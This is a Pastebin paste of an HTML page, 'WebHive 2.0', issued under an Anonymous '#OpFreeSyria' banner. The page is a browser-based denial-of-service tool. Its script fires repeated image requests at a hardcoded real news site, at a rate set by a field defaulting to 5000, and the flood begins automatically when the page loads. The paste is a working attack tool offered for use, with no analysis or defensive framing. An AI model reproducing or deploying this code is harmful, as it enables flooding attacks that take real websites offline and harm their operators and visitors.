Advertisement
Z3R089

asdukh

Oct 9th, 2013
88
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.42 KB | None | 0 0
  1. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2. <html xmlns="http://www.w3.org/1999/xhtml">
  3. <head>
  4. <meta http-equiv="Content-Type" content="text/html; charset=utf-8"g">
  5.  
  6. <link rel="SHORTCUT ICON" type="chliz" href="http://th07.deviantart.net/fs70/PRE/i/2013/128/2/d/syria_grunge_flag_by_think0-d2rwit7.jpg">
  7. <title>#FuckYouGov- Webhive 2.0</title>
  8. <style type="text/css">
  9. body {
  10. background: url("http://4.bp.blogspot.com/-U4fk3inVqsg/UiAecEvq5wI/AAAAAAAA4Mw/uB3-IxAQDN4/s1600/No+war+with+Syria.jpg");
  11. background-repeat: no-repeat;
  12. background-position: right;
  13. background-attachment: fixed;
  14. background-color: #000000;
  15. margin-top: 5%;
  16. margin-bottom: 5%;
  17. margin-left: 15%;
  18. margin-right: 15%;
  19. font-family:"Courier New", Courier, monospace;
  20. color: #FFFFFF;
  21. }
  22. fieldset {
  23. border-style: none;
  24. margin: 10px;
  25. }
  26. p {
  27. margin: 0;
  28. }
  29. input {
  30. margin: 0;
  31. background-color: transparent;
  32. border: none;
  33. text-align: center;
  34. font-family:"Courier New", Courier, monospace;
  35. color: #FFFFFF;
  36. }
  37. </style>
  38. <script language="JavaScript">
  39. <!-- Disable
  40. function disableselect(e){
  41. return false
  42. }
  43. function reEnable(){
  44. return true
  45. }
  46. //if IE4+
  47. document.onselectstart=new Function ("return false")
  48. document.oncontextmenu=new Function ("return false")
  49. //if NS6
  50. if (window.sidebar){
  51. document.onmousedown=disableselect
  52. document.onclick=reEnable
  53. }
  54. //-->
  55. </script>
  56. </head>
  57. <body onLoad="type()">
  58. <fieldset>
  59. <div id="title" align="center"><font size="+3" color="#FF0000">[#</font><font size="+3">OpFreeSyria</font><font size="+3" color="#FF0000">] -- [</font><font size="+3">WebHive</font><font size="+3" color="#FF0000">]</font></div><br><br>
  60.  
  61. <div id="hive" align="center">
  62. <font color="#FF0000">[</font>TARGET<font color="#FF0000">]</font><br>
  63. <input name="target" id="target" size="100" value="http://www.addounia.tv/"><br><br>
  64. <font color="#FF0000">[</font>Free Syria<font color="#FF0000">]</font><br>
  65. <input id="requests" size="100" value="5000"><br><br>
  66. <font color="#FF0000">[</font><font color="#FF0000">]</font><br>
  67. <input id="message" size="100" value="Muslim Hackers From Morroco & Mexico"><br><br>
  68. <font color="#FF0000">[</font>STATUS<font color="#FF0000">]</font><br>
  69.  
  70. SOLICITUDES <p id="requested">0</p>
  71. LOGROS <p id="succeeded">0</p>
  72. FALLIDOS <p id="failed">0</p><br>
  73. <button id="fire" style="background-color:#000000; border-color: rgb(255, 255, 255); color: rgb(255, 255, 255);"> STOP! </button><br><br><br>
  74. </div>
  75. <script>
  76. (function () {
  77. var fireInterval;
  78. var isFiring = false;
  79. var currentTime = new Date();
  80. var lastSuccess = currentTime.getTime();
  81.  
  82. var requestedNode = document.getElementById("requested"),
  83. succeededNode = document.getElementById("succeeded"),
  84. failedNode = document.getElementById("failed"),
  85. targetNode = document.getElementById("target"),
  86. fire = document.getElementById("fire"),
  87. messageNode = document.getElementById("message"),
  88. requestsNode = document.getElementById("requests"),
  89. timeoutNode = document.getElementById("timeout");
  90.  
  91. var target = targetNode.value;
  92. targetNode.onchange = function () {
  93. target = this.value;
  94. };
  95.  
  96. var requestsHT = {};
  97.  
  98. var requested = 0,
  99. succeeded = 0,
  100. failed = 0;
  101.  
  102. var makeHttpRequest = function () {
  103. if ( (currentTime.getTime()-lastSuccess) > 10000) {
  104. return;
  105. } else {
  106. lastSuccess = currentTime.getTime();
  107. };
  108.  
  109. var rID =Number(new Date());
  110.  
  111. var img = new Image();
  112. img.onerror = function () { onFail(rID); };
  113. img.onabort = function () { onFail(rID); };
  114. img.onload = function () { onSuccess(rID); };
  115. img.setAttribute("src", target + "?id=" + rID + "&msg=" + messageNode.value);
  116. requestsHT[rID] = img;
  117. onRequest(rID);
  118. };
  119.  
  120. var onRequest = function (rID) {
  121. requested++;
  122. requestedNode.innerHTML = requested;
  123. };
  124.  
  125. var onComplete = function (rID) {
  126. delete requestsHT[rID];
  127. };
  128.  
  129. var onFail = function (rID) {
  130. // failedCtr++;
  131. //failedCtrNode.innerHTML = failedCtr;
  132. succeeded++; //Seems like the url will always fail it it isn't an image
  133. succeededNode.innerHTML = succeeded;
  134. delete requestsHT[rID];
  135. };
  136.  
  137. var onSuccess = function (rID) {
  138. succeeded++;
  139. succeededNode.innerHTML = succeeded;
  140. delete requestsHT[rID];
  141. };
  142.  
  143. fire.onclick = function () {
  144. if (isFiring) {
  145. clearInterval(fireInterval);
  146. isFiring = false;
  147. this.innerHTML = "FIRE!";
  148. } else {
  149. isFiring = true;
  150. this.innerHTML = "STOP!";
  151. fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(requestsNode.value) | 0));
  152. }
  153. };
  154.  
  155. function start() {
  156. if (isFiring) {
  157. clearInterval(fireInterval);
  158. isFiring = false;
  159. this.innerHTML = "FIRE!";
  160. } else {
  161. isFiring = true;
  162. this.innerHTML = "STOP";
  163. fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(requestsNode.value) | 0));
  164. }
  165. };
  166. document.getElementById("target").value = "http://www.addounia.tv/";
  167. start();
  168. })();
  169. </script>
  170. <div id="footer" align="center"><font color="#FF0000"># [</font>MexicanHackers<font color="#FF0000">] -- [</font>ANONYMOUS<font color="#FF0000">] #</font></div>
  171.  
  172. </fieldset>
  173. <script type="text/javascript" src="http://www.usuarios-online.com/usuarios.php?v=www.e-viphostchile.tk/acta.html"></script> <a href="http://www.usuarios-online.com/en/">users online</a>
  174. </body>
  175. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement